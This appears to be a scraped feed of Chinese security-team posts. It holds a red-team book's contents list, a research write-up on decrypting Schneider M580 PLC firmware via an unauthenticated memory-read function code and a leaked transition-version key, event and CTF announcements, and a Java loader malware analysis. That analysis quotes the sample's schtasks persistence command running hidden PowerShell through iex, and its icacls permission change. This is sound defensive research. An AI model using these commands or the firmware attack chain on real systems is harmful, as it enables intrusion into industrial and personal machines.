2.3.1　MITRE ATT&CK框架 16

2.3.2　统一击杀链 17

2.3.3　TIBER-EU 17

2.3.4　CBEST 18

2.4　红队评估 18

2.4.1　全范围渗透测试 19

2.4.2　目标导向型评估 19

2.4.3　基于场景的对抗模拟 20

2.4.4　紫队 20

2.4.5　桌面推演 21

2.5　红队挑战 21

2.5.1　提升其他团队水平 21

2.5.2　失败也是收获 22

2.6　参考文献 23

2.7　技能测试 24

第3章　红队基础设施 25

3.1　红队基础设施概述 26

3.2　命令与控制 26

3.2.1　命令与控制通信信道 27

3.2.2　重定向器 28

3.2.3　命令与控制系统搭建 29

3.3　技能测试 46

第4章　现代红队方法论与工具 47

4.1　规划 47

4.1.1　交战规则 48

4.1.2　启动会议 48

4.1.3　沟通 48

4.2　信息收集 48

4.2.1　自治系统编号 48

4.2.2　证书透明度 49

4.2.3　流量代理 49

4.2.4　域名服务 53

4.2.5　元数据 60

4.2.6　用户名收集 60

4.2.7　软件发现 62

4.2.8　数据泄露 62

4.3　初始访问 63

4.3.1　密码喷洒攻击 63

4.3.2　移动设备管理 68

4.3.3　社会工程学与物理访问 69

4.3.4　攻击载荷准备 69

4.3.5　Web应用程序漏洞 75

4.4　持久化 75

4.5　横向移动 76

4.5.1　获取凭证 77

4.5.2　收集域信息 77

4.5.3　Kerberos票据破解 79

4.5.4　活动目录证书服务 80

4.5.5　SCCM滥用 83

4.6　后渗透 84

4.7　报告编写 84

4.8　技能测试 85

第5章　社会工程学和物理安全评估 87

5.1　电话社工：拨打电话并欺骗你的

目标 88

5.1.1　信息收集 88

5.1.2　电话社工 89

5.1.3　攻击目标 90

5.2　鱼叉式网络钓鱼：是时候收网了 91

5.2.1　基础设施 92

5.2.2　钓鱼邮件/即时消息的构建

要点 103

5.2.3　攻击目标 104

5.3　能从内部听到我们吗 105

5.3.1　远程信息收集 105

5.3.2　门禁卡复制 106

5.3.3　现场信息收集 111

5.3.4　现场社会工程学 112

5.3.5　物理建筑绕过 112

5.4　技能测试 114

第6章　高级后渗透技术 116

6.1　后渗透概述 116

6.1.1　评估检测与响应能力并理解数据

泄露的影响 117

6.1.2　提升蓝队能力 117

6.2　如何维持访问、使用持久性机制和

创建后门 120

6.2.1　后门类型 120

6.2.2　反向Shell与正向Shell对比 127

6.2.3　在二进制文件中植入后门 131

6.2.4　使用代码混淆规避检测 133

6.2.5　系统级后门 135

6.2.6　内核级后门 138

6.2.7　硬件和固件后门 142

6.2.8　计划任务 143

6.2.9　新用户 143

6.3　C2与隐蔽通道 143

6.3.1　DNS隧道技术的工作原理 144

6.3.2　HTTP/HTTPS 隧道技术 146

6.3.3　非常规协议 146

6.3.4　其他命令与控制技术和工具 146

6.4　如何实施横向移动 148

6.5　合法工具与就地取材式攻击 151

6.5.1　PowerShell在后渗透任务中的

应用 151

6.5.2　PowerSploit和Empire框架 152

6.5.3　BloodHound 154

6.5.4　使用 Windows 管理规范执行后

渗透任务 155

6.5.5　Sysinternals与PsExec 155

6.5.6　使用 Windows 远程管理执行后

渗透任务 156

6.5.7　系统自带可执行文件、库文件和

实用脚本 156

6.6　后渗透权限提升 158

6.6.1　清除入侵痕迹的方法 159

6.6.2　隐写术 159

6.7　技能测试 162

第7章　AD与Linux环境 165

7.1　AD基础 165

7.1.1　集中式数据存储与高可用性 166

7.1.2　安全性 166

7.1.3　AD架构 168

7.1.4　AD信任关系 170

7.1.5　关键的AD协议与服务 172

7.2　Microsoft Entra ID和Azure 178

7.3　AD攻击技术 183

7.3.1　实验环境搭建 183

7.3.2　AD信息收集与枚举 185

7.3.3　密码喷洒和ASREPRoast

攻击 192

7.3.4　Windows AD评估中有用的LDAP查询 195

7.3.5　BloodHound功能强大 198

7.3.6　在AD环境中使用Responder

收集凭证 199

7.3.7　使用Secretsdump提取凭证 205

7.3.8　使用Lsassy从LSASS中提取

凭证 207

7.3.9　使用DonPAPI 攻击 Windows

DPAPI 208

7.3.10　使用 Certipy 和 BloodHound 进行ADCS的信息收集与枚举 209

7.3.11　使用Certipy进行漏洞利用 211

7.3.12　滥用自主访问控制列表和访问

控制条目 213

7.3.13　Golden SAML攻击 213

7.3.14　Microsoft Entra Connect（Azure AD Connect）Sync账户接管 215

7.3.15　Microsoft Entra 特权身份管理

滥用 216

7.4　高级Linux环境攻击技术 217

7.4.1　缓冲区溢出原理简述 217

7.4.2　缓冲区溢出的利用方法 217

7.4.3　易受攻击代码示例 219

7.4.4　使用面向返回编程绕过不可执行栈保护 222

7.4.5　使用ROP绕过NX保护 223

7.5　技能测试 225

第8章　AI时代下红队评估的发展

前景 228

8.1　理解AI在红队评估中的现状 229

8.2　构建AI驱动的渗透测试工具 230

8.3　研究微调过的未经审查的AI模型 242

8.4　理解红队评估中的检索增强生成

技术 244

8.4.1　向量嵌入 245

8.4.2　向量数据库存储 247

8.4.3　用户查询处理 249

8.4.4　语义搜索与文档检索 249

8.4.5　LLM或SLM的上下文准备 252

8.4.6　响应生成、后处理与优化 253

8.5　AI与自主系统的红队评估 256

8.6　跟进快速发展的技术 263

8.7　技能测试 264

第9章　漏洞挖掘与高效信息收集

导论 267

9.1　理解漏洞挖掘计划 267

9.1.1　漏洞挖掘计划的类型 268

9.1.2　攻击面管理与漏洞挖掘计划

对比 270

9.1.3　漏洞披露计划与漏洞挖掘计划的

对比 271

9.1.4　入门指南：如何成为漏洞挖掘

计划中的道德黑客 271

9.1.5理解参与范围与规则约定 272

9.2探索有效的信息收集 274

9.2.1主动式与被动式信息收集 274

9.2.2理解开源情报 275

9.2.3　利用DNS进行信息收集 276

9.2.4　识别技术和管理联系人 279

9.2.5识别云资产与自托管资产 281

9.2.6社交媒体数据抓取 284

9.2.7密码学缺陷 285

9.2.8　利用证书透明度获取内部和外部

主机的敏感信息 290

9.2.9利用密码转储文件 292

9.2.10文件元数据信息收集 294

9.2.11搜索引擎战略分析与枚举 296

9.2.12网站归档/缓存 297

9.2.13　公共源代码仓库、密钥和其他

敏感信息 298

9.2.14　信息收集工具Recon-ng的

使用 298

9.2.15Shodan 304

9.2.16　Amass、Maltego及其他开源情

报工具 305

9.2.17　使用生成式人工智能和Gorilla

大语言模型来与Amass等工具

交互 306

9.2.18　使用Open Interpreter与信息收集工具交互 307

9.3开展主动式信息收集 311

9.3.1　使用Python创建自己的扫

描器 313

9.3.2探索不同类型的枚举 314

9.3.3　在漏洞挖掘中使用

BloodHound 326

9.3.4数据包检查与窃听 327

9.4理解漏洞扫描的艺术 327

9.4.1理解漏洞扫描的类型 328

9.4.2　运行漏洞扫描时需要考虑的

挑战 329

9.5　对Web应用程序和API进行信息

收集 331

9.5.1　目录和文件暴力破解 331

9.5.2API信息收集 334

9.6　漏洞发现的沟通与编写高效的漏洞

挖掘报告 336

9.7技能测试 338

第10章　渗透现代Web应用程序和

API 342

10.1　Web应用攻击、OWASP Web应用

十大安全风险和OWASP大语言模

型应用十大安全风险概述 343

10.1.1　HTTP 343

10.1.2　理解Web会话 349

10.1.3　Web应用程序的OWASP十大

安全风险 351

10.1.4　大语言模型应用的OWASP十大

安全风险 352

10.2　搭建自己的Web应用程序实验

环境 353

10.3　理解业务逻辑缺陷 354

10.4　理解基于注入的漏洞 355

10.4.1　数据库攻击与SQL注入漏洞

利用 355

10.4.2　命令注入漏洞 367

10.4.3　轻量级目录访问协议注入

漏洞 369

10.5　利用认证机制漏洞 370

10.5.1　凭证暴力破解 370

10.5.2　理解会话劫持 371

10.5.3　理解重定向攻击 375

10.5.4　利用默认凭证 375

10.5.5　Kerberos漏洞利用 376

10.6　利用授权漏洞 377

10.6.1　理解参数污染 377

10.6.2　利用不安全的直接对象引用

漏洞 378

10.7　理解跨站脚本漏洞 379

10.7.1　反射型XSS攻击 380

10.7.2　存储型XSS攻击 381

10.7.3　XSS绕过技术 385

10.7.4　XSS防护措施 386

10.8　理解跨站请求伪造与服务器端请求

伪造攻击 387

10.8.1　服务器端请求伪造攻击 389

10.8.2　使用WebSploit Labs利用服务器

端请求伪造漏洞 390

10.9　理解单击劫持 393

10.10　利用安全配置错误 393

10.10.1　利用目录遍历漏洞 393

10.10.2　理解Cookie操纵攻击 394

10.11　利用文件包含漏洞 395

10.11.1　本地文件包含漏洞 395

10.11.2　远程文件包含漏洞 396

10.12　利用不安全的编码实践 396

10.12.1　源代码中的注释 396

10.12.2　缺乏错误处理和过度冗长的

错误处理 396

10.12.3　硬编码凭证 397

10.12.4　条件竞争 397

10.12.5　未受保护的API 397

10.12.6　隐藏元素 400

10.12.7　缺乏代码签名 400

10.13　使用更多的Web应用程序黑客

工具 400

10.14　技能测试 404

第11章　自动化漏洞挖掘与AI技术

赋能 407

11.1　传统漏洞挖掘方法 407

11.2　AI驱动的漏洞挖掘自动化 409

11.2.1　漏洞挖掘平台的AI能力 417

11.2.2　企业外部风险暴露全景评估 418

11.2.3　使用AI进行漏洞优先级排序 418

11.2.4　利用AI生成扫描器模板 420

11.3　漏洞挖掘中的AI模型训练、微调和RAG 424

11.3.1　部署AI模型 424

11.3.2　AI模型的微调 424

11.3.3　将RAG和AI智能体用于漏洞

挖掘 426

11.3.4　工具调用 427

11.4　使用AI进行漏洞挖掘将面临的

挑战 429

11.4.1　内容审查限制的模型和安全护栏

机制 429

11.4.2　幻觉或虚构 429

11.5　技能测试 430

附录　选择题答案 433

了解更多

互动有礼

抽奖条件:2026年3月23日前关注本公众号

抽奖方式:转发本文至朋友圈并保留至开奖日,禁止开启分组，长按下图二维码即可

开奖时间:2026年3月26日8时

开奖后，直接向公众号发送中奖截图+朋友圈转发记录截图

（超过24小时未领取视为自动放弃~）

跳转微信打开

施耐德 M580 工业控制器固件安全分析与解密研究

Fri, 20 Mar 2026 08:02:00 +0800

原创 ic3blac4 2026-03-20 08:02 辽宁

1、前言

施耐德Modicon M580 系列可编程自动化控制器（PAC）作为高端工业控制设备，广泛部署于电力、石化、水处理等关键基础设施领域。其采用 ePAC 架构，运行 VxWorks 实时操作系统，支持 EtherNet/IP、Modbus TCP 等主流工业协议。如下图为产品的设计架构

随着 OT 与 IT 网络融合加速，PLC 已成为攻击者重点目标。该设备固件中不仅包含操作系统内核与协议栈实现，还可能隐藏默认凭证、未公开接口或后门逻辑。因此，对固件进行深度解密与逆向分析，是评估设备真实安全水位的前提。

然而，施耐德自 V3.x 起对固件实施 AES-256 加密保护，V4.x 更引入数字签名机制，形成“加密+认证”双重防护。这是否意味着固件安全无懈可击？本文将从实战攻防视角出发，系统性还原从协议层突破 → 内存读取 → 密钥提取 → 算法逆向 → 跨版本解密的全链路攻击路径，揭示其固件保护机制中的设计缺陷。。

2、攻击面识别：从协议私有功能码切入

施耐德M340、M580等系列工业控制器采用其自研的私有协议，内部统称为UMAS协议，该协议是基于Modbus协议进行的魔改，包含有很多私有设计的功能码字段，如下所示，其中有pu_ReadMemoryBlock、pu_WriteMemoryBlock、pu_ReadBOL、pu_WriteVarList操作等等。

关于协议相关的研究笔者在各大会议上均有分享，不再赘述。我们本次聚焦于固件分析，通过对私有协议分析，发现V3.X版本固件中存在物理内存读取功能码且没有任何身份验证，因此可以利用0x28功能码读取多有的控制器内存数据，经过分析内存数据中包含固件代码，解密固件的AES密钥，工程数据，密码哈希等等关键数据。

Dump出内存后构建了完整的内存布局图如下所示

根据特征进行分析发现了AES相关密钥及IV值，如下所示。

安全缺陷分析：

明文存储：密钥未经混淆或加密，直接暴露；
静态共享：所有同型号设备使用相同密钥，单点突破影响全系列；
无访问控制：0x28关键私有功能码未实施认证，任意网络可达设备均可读取。

至此，V3.x 固件解密的“钥匙”已被掌握。

3、V3.x 固件解密：算法逆向与流程还原

M580 V3.x 固件是以.ldx为结尾的压缩包文件，利用工具解压后可以得到如下所示的文件

核心固件文件以 .img 为扩展名，其结构如下

其中固件头标识为Magic: 27 05 19 56, Version: "vxWorks V03.20..."

通过逆向内存中代码段，我们识别出以下特征：

AES S-Box 查找表：标准 256 字节 S-Box 完整存在；
密钥长度 32 字节：对应 AES-256；
CBC 模式：解密前存在 IV 异或操作；
LZMA 头部：解密后数据以 5D 00 00 80 00... 开头，确认压缩算法为 LZMA。

完整的解密流程如下所示

跳过文件头：忽略前 0x40 字节；
AES-256-CBC 解密：使用提取的 Key 和 IV；
去除 PKCS7 填充：检测末尾 N 字节是否均为 0xN，若是则移除；
LZMA 解压：使用 lzma.decompress(..., format=lzma.FORMAT_ALONE)；
切除头部 512 字节：获得最终固件文件镜像。

经过实验发现在V3.X的固件版本在LZMA 数据格式还是有细微差异，如下图所示

但所有版本的解密密钥及IV全部一致，经验证，该流程可成功解密 V3.10、V3.20、V3.99等多个版本固件。使用脚本编写解密SV3.99过渡固件版本的过程如下所示

解密后的文件二进制如下所示

4、V4.x 安全固件突破：跨版本密钥演进分析

施耐德在 V4.x 版本中引入了多项安全增强措施：

新加密密钥：更换了 AES 密钥和 IV
数字签名：引入 CMS/PKCS#7 签名机制
证书验证：使用 X.509 证书链验证固件完整性
新封装格式：采用 SEDP (Secure Encrypted Data Package) 格式

V4.x 固件采用 .sedp 扩展名，实际为 ZIP 压缩包，如下所示

解压后的文件如下所示

PackageMetadata.json 关键字段如下所示

{
"schemaName": "Data Package",
"dataPackage": {
"category": "Firmware",
"productInfo": {
"vendorName": "Schneider Electric",
"productName": "BME P58 1020 Unity CPU",
"version": "04.01.36"
    },
"items": [{
"files": {
"file": [
          {"name": "M580.img", "hashValue": {"type": "SHA_256", "value": "047DE8AE..."}},
          {"name": "M580.cms", "hashValue": {"type": "SHA_256", "value": "DC14E5F0..."}}
        ]
      }
    }]
  }
}

M580.cms 文件采用 CMS (Cryptographic Message Syntax) / PKCS#7 格式：

证书链结构如下所示

由于工控设备的长生命周期决定了厂商必须要考虑老版本的升级问题，在研究过程中发现如果老旧设备要升级至V4.X固件版本，必须要先升级至V3.99固件版本，因此V3.99作为过渡版本，其解密后的固件镜像中必然包含了V4.x的加密密钥，否则无法作为衔接版本继续升级至较高版本。

基于此经验，先利用之前的分析的V3.X固件解密的思路将V3.99固件解密后进行分析，从字符串中搜索类似于AES密钥的字符串，发现内置了V4.X版本的AES密钥和IV值，因此提取出这些信息后即可解密V4.X的固件，整体的解密思路如下流程所示。

整体的V4.X固件解密流程如下所示

利用该思路编写对应的工具，针对2025年后半年发布的最新固件进行解密，过程如下所示

解密后的固件文件如下所示，包含了主固件镜像、固件升级 RTP 程序、HTTP 代理服务、控制系统服务器、Web 管理界面等。

至此最新版本的M580系列PLC加密固件已经完美解密，可以继续后面的安全分析工作。再次复盘整个解密过程，发现该产品设计中的如下几个缺陷：

密钥硬编码：所有同版本设备共享相同密钥
明文存储：密钥未经保护存储于可读取内存
过渡版本泄露：V3.99 同时包含新旧密钥
协议漏洞：私有功能码缺乏认证机制
向后兼容陷阱：升级路径设计导致密钥链泄露

也正是由于工业场景的复杂及对高可用高可靠的严苛要求，才加剧了所有工控厂商在设计时将主要精力投入至业务功能，安全设计及测试投入不足才造就了工控系统及设备普遍脆弱的局面。

5、安全影响与防护建议

本研究发现施耐德过渡固件版本包含敏感密钥信息的漏洞影响施耐德 M580 全系列产品：

BMEP58xxxx 系列 CPU 模块
BMEH58xxxx 系列热备 CPU
BMEP58xxxx 系列安全 CPU

覆盖固件版本：V3.x - V4.x 全版本

潜在的攻击场景包括但不限于：

1) 固件逆向分析及漏洞挖掘

攻击者获取固件 → 解密 → 逆向分析 → 发现 0-day 漏洞 → 武器化利用

2) 后门植入

解密固件 → 植入恶意代码 → 重新打包 → 社会工程诱导升级 → 控制设备

3) 知识产权窃取

解密固件 → 提取细节内容实现 → 开发兼容设备 → 商业竞争

基于此特提出如下的防护建议：

工控厂商层面
密钥管理改进：

采用设备级唯一密钥

使用硬件安全模块（HSM）保护密钥

实施密钥分层管理

固件保护增强

采用白盒加密技术保护密钥

实施代码混淆和反调试机制

使用安全启动验证固件完整性

升级路径重设计

避免在过渡版本中暴露新密钥

使用密钥交换协议动态协商密钥

实施固件版本隔离机制

业主用户层面
网络隔离

将 PLC 设备部署于独立 VLAN

实施严格的防火墙策略

禁止 PLC 直接暴露于互联网

访问控制

启用设备内置的访问控制功能

定期更换默认密码

实施最小权限原则

监控审计

部署工控入侵检测系统

监控异常 Modbus 流量

记录所有固件升级操作

固件管理

仅从官方渠道获取固件

验证固件数字签名

建立固件版本基线

6、总结

本文分析了施耐德M580工业控制器固件保护机制，完整还原了从 V3.x 到 V4.x 的加密体系演进过程。主要研究成果包括：

密钥提取：从设备内存中提取 AES-256 加密密钥和初始化向量
算法逆向：完整还原 AES-256-CBC + LZMA 加密压缩方案
跨版本攻击：发现过渡版本 V3.99 中的密钥泄露问题，实现 V4.x 固件解密
工具开发：实现支持全版本的自动化固件解密工具

本研究再次印证：固件加密若缺乏密钥保护、协议认证与安全启动支撑，仅是“纸面安全”。呼吁工控厂商在设计阶段即融入纵深防御、内嵌安全的理念，共同筑牢工业控制系统安全底座。

结束

招新小广告

ChaMd5 Venom 招收大佬入圈

新成立组IOT+工控+样本分析长期招新

欢迎联系admin@chamd5.org

跳转微信打开

直播预约 | 顺丰SRC第四届白帽技术沙龙，干货抽奖全都有！

Thu, 19 Mar 2026 17:06:00 +0800

ChaMd5安全团队 2026-03-19 17:06 辽宁

顺丰SRC第四届白帽技术沙龙暨2025年度白帽颁奖盛典白帽师傅集合

各位白帽师傅集合啦！

第四届顺丰SRC白帽技术沙龙

暨2025年度白帽颁奖典礼

一年一度，如约而至！

邀请每一位热爱技术的你！

这里有前沿的技术分享，

有惺惺相惜的同路人，

更有我们对安全始终如一的坚持！

3月28日 14:00

期待与你云端相聚！

速速预约直播间，我们不见不散！

PART.01

沙龙议程抢先看

议题一：

为什么你挖不到漏洞？——换个思路，从信息搜集开始

议题介绍：

本议题聚焦实战化漏洞挖掘，从思维重构、方法练习到实战落地，全程围绕攻击面拓展展开，帮白帽高效找到更多可利用攻击点。搭配大量真实案例拆解，思路清晰、上手即用，让你真正把信息搜集能力转化为实战挖洞成果。

演讲嘉宾：种子

顺丰SRC 2025年年度Top2，国内某知名SRC 2025年年度Top1；Timeline Sec团队寅虎组核心成员，曾帮助团队拿下多个SRC厂商优秀合作伙伴；曾独立挖掘多个国内SRC严重漏洞，擅长信息搜集，逻辑漏洞，以及各种鬼斧神工的挖洞技巧。

议题二：

.NET应用安全最后一公里：基于Profiling技术构建RASP运行时防护

议题介绍：

本议题将聚焦基于 .NET Profiling 技术实现 ASP.NET 运行时应用自保护（RASP）的技术原理与工程实践。通过深入分析 .NET CLR Profiling 机制，介绍如何在不修改应用源码的情况下，对 ASP.NET 应用运行时进行动态插桩与行为监控，实现对关键安全风险的实时检测与防护。

议题将结合实际案例，讲解如何通过 Profiling 技术在运行时拦截关键函数调用，对常见的 Web 攻击行为（如命令执行、文件操作、反序列化等）进行检测与防护。同时，还将分享在 IIS 与 ASP.NET 生产环境中部署 RASP 的工程实现思路，以及在性能、兼容性和稳定性方面的实践经验。

演讲嘉宾：catr00t

来自顺丰安全成文实验室，主要研究方向包括 Web 安全、漏洞挖掘、RASP 防护机制以及 Java/.NET 运行时安全技术。

议题三：

重复测试的艺术——如何从“无效”坚持中挖到高价值漏洞

议题介绍：

在当今的漏洞挖掘生态中，思路和技巧多如牛毛，但现实很骨感，有些学到的技巧并不能让我们在近期一段时间内出洞，这种“投入无即时回报”的状态通常让我们心生怀疑，那些暂时没能让我们出洞的技巧和思路，慢慢就被遗忘或者弃用了。这种习惯很可能让某些高价值漏洞从我们手里溜走。本议题通过一些漏洞案例来说明高价值漏洞可能就藏在不怕麻烦的重复测试中，最后讲讲个人在工具开发中遇到的坑点，希望能带给各位师傅一些启发。

演讲嘉宾：BePower

国内某一线SRC 2025年年度Top2，北山安全团队核心成员。

议题四：

AI业务下的混合云治理

议题介绍：

AI业务迅猛发展，大模型安全与Agent安全逐渐进入行业视线。本议题将视角拉回到AI业务自身的安全风险，围绕AI业务团队的运营合作模式、业务组织架构，以及资产分布等多个角度，讨论与常规Web业务的差异。

分析新兴产业所面对的混合云风险，并给出可落地的系统化风控方案。

演讲嘉宾：观沧海

独立安全研究员，有丰富的红蓝对抗及Windows开发经验，对终端攻防有较深理解。目前主要从事AI业务场景的混合云风控。

PART.02

直播预约

直播时间：

2026年3月28日

14:00-16:45

扫码预约直播：

扫描上方二维码预约，

或搜索视频号【顺丰安全应急响应中心】预约直播

多轮抽奖好礼等你来！

80+份抽奖好礼已就位，超多惊喜等你来抽，

手速和运气都不能少～

活动主办方

合作伙伴

跳转微信打开

2026SUCTF Writeup by Mini-Venom

Wed, 18 Mar 2026 08:03:00 +0800

原创 Mini-Venom 2026-03-18 08:03 辽宁

ChaMd5安全团队成立于2016年，专注于算法加解密、安全漏洞挖掘、CTF竞赛及安全人才培养。至今团队成员有200+人，分别来自阿里、滴滴、启明星辰、绿盟、知道创宇、奇安信、永信至诚、360、陌陌、牛盾、无声信息等安全公司，且也有部分在校学生与自由职业者。

自团队成立以来，曾荣获来自华为、微软、蚂蚁金服、百度、京东和滴滴等多家企业的致谢，向企业报告的漏洞合计超10w+。团队成员也曾多次在企业 CTF 赛事中获奖。ChaMd5 安全团队为维护企业安全建设而成立，竭尽全力培养安全人才，服务于各大企业。

ChaMd5安全团队将继续与平台一同进步，也欢迎更多的小伙伴加入我们哦！

安全厂商漏洞提交
2025年喜马拉雅SRC年度第六名(kk)
2025年京东SRC年度第五名(Str1am_)健康隐私妙手
2025年京东SRC年度第八名(N4vol)
2025年京东SRC“优秀合作伙伴”称号
2024年荣获阿里云安全守护卫士
2024年京东SRC“优秀合作伙伴”称号和个人第四名(Str1am_)
2024年盘锦市演练优秀攻击队
2024年荣获某市局经侦支队感谢信
2024年荣获某市委网信办感谢信
2024年荣获国家计算机网络与信息安全管理中心辽宁分中心感谢信
2023年京东SRC个人第三名(Str1am_)
2023年补天总榜个人排名第十(r00t4dm)
2023年多点SRC年度第三(Cra5h)
2023年TCL年度第四(Cra5h)
2023年同程SRC个人年度第二(IT小丑)
2023年滴滴SRC个人年度第五(IT小丑)
2023年漏洞盒子团队第一季度 第三名
2023年漏洞盒子团队第三季度 第二名
2023年漏洞盒子团队第四季度 第三名
2023年大连网信办“连盾”第二名
2022年PSRC团队年度第三名
2022年BSRC团队年度第二名
2022年货拉拉获得”黄金轻卡“称号
2021年DSRC获得年度第三名
2021年BSRC获得年度第三名
2017-2020年DSRC(滴滴)年度安全团队第一名
2020年JSRC(京东)团队年度第二名
2020年BSRC(百度)第三名
2020年网易SRC团队年度第二名
2020年58SRC团队年度第二名
2020年字节跳动SRC团队年度第三名
2020年360SRC年度团队第二名
2020年TSRC(腾讯)年度合作伙伴奖
2019年JSRC(京东)团队年度第三名
2019年华为云2019年度团队二等奖、华为终端2019年度最具潜力奖
2019年MTSRC(美团)年度团队第二名
2019年ASRC(阿里)年度合作伙伴奖
2019年合肥市网络安全攻防演练大赛攻防演练赛 线下第八名
2019年BSRC(百度)年度第三名和校园年度第二名
2018年BSRC(百度)年度第二名
2017年BSRC(百度)优秀团队
CTF比赛
2025年第五届鹏城杯线上第九名
2025年DASCTF下半年赛 第四名
2025年CCF智能汽车大赛 三等奖
2025年DASCTF上半年赛 第八名
2025第一届OpenHarmonyCTF专题赛 第五名
2025年第八届封神台 第一名
2024年国城杯 线下第六名
2024DASCTF 暑假挑战赛 第一名
2024年矩阵杯 优胜奖
2024年举办第一届 VCTF 纳新赛
2023年中华武数杯 三等奖
2023年NCTF 第八名
2022年第五届强网拟态 第九名
2022年安洵杯 第七名
2021年第四届强网拟态 第一名
2021年长安杯总决赛一等奖
2021年巅峰极客 第一名
2020年“祥云杯”线上第三名
2020年GeekPwn云靶场挑战赛第八名
2020年线上网鼎杯“青龙组“第五名
2019年“湖湘杯”网络安全技能大赛线下第四名
2019年XPpwnCTF第五名
2019年SUCTF 线上第三名
2019年第三届“红帽杯”网络安全攻防大赛 线上社会网安第五名
工控比赛
2022年之江杯第五名&内生安全贡献荣誉奖
2020年之江杯第一名
2018年赛博地球杯工业互联网安全大赛线下总排名 第二名
IoT比赛
2024年第七届“强网”拟态防御国际精英挑战赛—低空经济赛道三等奖（第五名）
2023年DataCon漏洞分析赛道第三名
2022年DataCon物联网安全第四名
2020年西湖论剑IOT挑战赛第一名
2019年360SRC48小时IoT破解大赛第四名
AI比赛
2025年LLM指令遵循攻防赛第一名
2025年DataCon AI三等奖
2024年DataCon AI第四名
2024年ByteAI安全挑战赛决赛第十名
2022年2022 CCF BDCI 竞技赛单赛题决赛 基于TPU平台实现人群密度估计 二等奖
2022年字节安全AI挑战赛 第四名
2021年iFLYTEK.AI 第十名
2020年BCTF AI PWN第六名
2019年强网杯AI 第十名
2019年BCTF RHG 人工智能第八名
车联网
2025年首届CCF智能汽车大赛线上第一名、线下三等奖
2024Block Harbor VicOne Automotive CTF 线上 第六名
2024年Super CS车联网安全攻防挑战赛线下 优胜奖
2024年VSEC挑战赛二 第六名
2023年CIICV车联网（智能网联汽车）漏洞挖掘挑战赛 优胜奖
2023年WIDC世界智能驾驶挑战赛 线上第二名
2022 第二届创安杯智能汽车信息安全公开赛 线上第九名
2022 CICV 智能网联汽车漏洞挖掘赛 线下一等奖
2022 CICV智能网联汽车漏洞挖掘赛 线上三等奖
2021年第二届中国智能网联汽车大赛“天融信杯“ 铜奖
2021年世界智能驾驶挑战赛 铜奖
区块链
2024年磐石安全实验室-FishCake项目审计竞赛第一
2023年MetaTrustCTF 参与命题
2023年NumenCTF 第十四名
团队书
2025年机械工业出版社合作伙伴“共生奖”
《ARM 汇编与逆向工程：蓝狐篇 基础知识》 荣获机械工业出版社“2024年度优秀图书奖”称号
《x86 汇编与逆向工程：软件破解与防护的艺术》 荣获机械工业出版社“2024年度优秀图书奖”称号
团队书籍列表
《CTF实战：技术、解题与进阶》
《物联网漏洞挖掘与利用》
《ARM汇编与逆向工程》
《x86软件逆向工程》
《汽车网络安全工程》
《红队实战指南 AI驱动的渗透测试》

https://github.com/ChaMd5Team/Venom-WP/blob/main/2026-SUCTF-WriteUp.pdf

更多 Writeup 详情

查看以下链接或点击文末阅读原文

结束

招新小广告

ChaMd5 Venom 招收大佬入圈

新成立组IOT+工控+样本分析长期招新

欢迎联系admin@chamd5.org

阅读原文

跳转微信打开

多阶段Java Loader恶意样本分析

Tue, 17 Mar 2026 08:01:00 +0800

原创 megaparsec 2026-03-17 08:01 天津

基本信息

文件名称	文件类型	MD5
groaxbaba.jar	jar	1db57b053ffcf1ee4e918cfd53c4d39c
java.jar	jar	a02a46893b9d79fef8e4488ec8d28a23
m_lock.jar	jar	7d010a082b9ce26d22d5e290481b149b

初始样本分析

以m_lock.jar为例，jadx打开，包含两个类Loader和RNvoMFSa，类Loader包含混淆。

类RNvoMFSa是用于辅助字符串解密，通过SHA-256哈希调用类名与硬编码盐值派生16字节AES密钥，使用AES/ECB/PKCS5Padding模式解密Base64编码的密文以还原明文字符串。

通过JADX-MCP，分析总结并生成执行时序图：Loader 类是Stringer混淆器生成的自定义类加载器，在JVM启动时通过多层加密解密、完整性校验和内存缓存机制，从加密资源中动态加载受保护的业务类，同时通过反射劫持程序入口以实现代码隐藏和防篡改保护。

托管样本分析

从沙箱报告（https://www.joesandbox.com/analysis/1879815/0/html）中发现其访问了一个GitHub Release资源下载链接。

使用仓库ID反查curl https://api.github.com/repositories/1122038145，主要结果如下，仓库全名为nonamebaba/0，所有者为nonamebaba

{
"id": 1122038145,
"node_id": "R_kgDOQuDxgQ",
"name": "0",
"full_name": "nonamebaba/0",
"private": false,
"owner": {
"login": "nonamebaba",
"id": 250884748,
"node_id": "U_kgDODvQyjA",
"avatar_url": "https://avatars.githubusercontent.com/u/250884748?v=4",
"gravatar_id": "",
"url": "https://api.github.com/users/nonamebaba",
"html_url": "https://github.com/nonamebaba",
"followers_url": "https://api.github.com/users/nonamebaba/followers",
"following_url": "https://api.github.com/users/nonamebaba/following{/other_user}",
"gists_url": "https://api.github.com/users/nonamebaba/gists{/gist_id}",
"starred_url": "https://api.github.com/users/nonamebaba/starred{/owner}{/repo}",
"subscriptions_url": "https://api.github.com/users/nonamebaba/subscriptions",
"organizations_url": "https://api.github.com/users/nonamebaba/orgs",
"repos_url": "https://api.github.com/users/nonamebaba/repos",
"events_url": "https://api.github.com/users/nonamebaba/events{/privacy}",
"received_events_url": "https://api.github.com/users/nonamebaba/received_events",
"type": "User",
"user_view_type": "public",
"site_admin": false
  },

查看这个仓库，内容如下：

background.png（MD5：716db862baf0de7d01fa2a145f0cffc5）实际为Jar包，包含同样的混淆。上传沙箱，查看沙箱分析报告https://sandbox.qianxin.com/tq/report/toViewReport.do?rid=1b0e80712d2a508976fcfc5312395c46&sk=88995683，这个Jar文件依旧是个Loader，其通过 PowerShell 从伪装文件（.png/.lib）读取脚本执行，并创建计划任务实现开机及定时持久化运行。

命令	含义
schtasks /query /TN "netspi-user" /FO LIST /V	查询名为 netspi-user的计划任务，/FO LIST 使用列表格式输出，/V 显示详细信息。
icacls.exe C:\ProgramData\Oracle\Java.oracle_jre_usage /grant "everyone":(OI)(CI)M	修改目录权限。给 Everyone 赋予 Modify权限，(OI)(CI) 表示对子目录和文件继承。通常用于确保恶意文件可写。
taskkill /F /IM powershell.exe /T	强制结束 powershell.exe 进程。/F 强制终止，/T 同时终止子进程。
schtasks /Create /TN "netspi-user" /TR "powershell -w hidden -nop -noni -exec bypass -c Get-Content -Path C:\Users\Public\Libraries\library.lib \| iex" /RU "lichao" /SC ONSTART /F	创建计划任务 netspi-user。开机执行 PowerShell。脚本内容从 library.lib 读取并通过 Invoke-Expression 执行，实现持久化。
